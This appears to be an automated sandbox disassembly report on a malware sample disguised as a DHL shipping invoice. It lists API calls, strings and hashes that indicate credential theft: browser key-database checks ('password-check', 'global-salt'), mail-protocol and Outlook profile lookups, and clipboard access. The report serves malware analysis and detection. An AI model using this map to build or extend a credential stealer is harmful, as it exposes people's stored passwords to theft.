                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                      • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3974772901-0
                                                                                                                                                                                                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                                                                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,757C0A60), ref: 00408EBE
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,757C0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2014771361-0
                                                                                                                                                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                                      • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                                      • String ID: Personalities
                                                                                                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
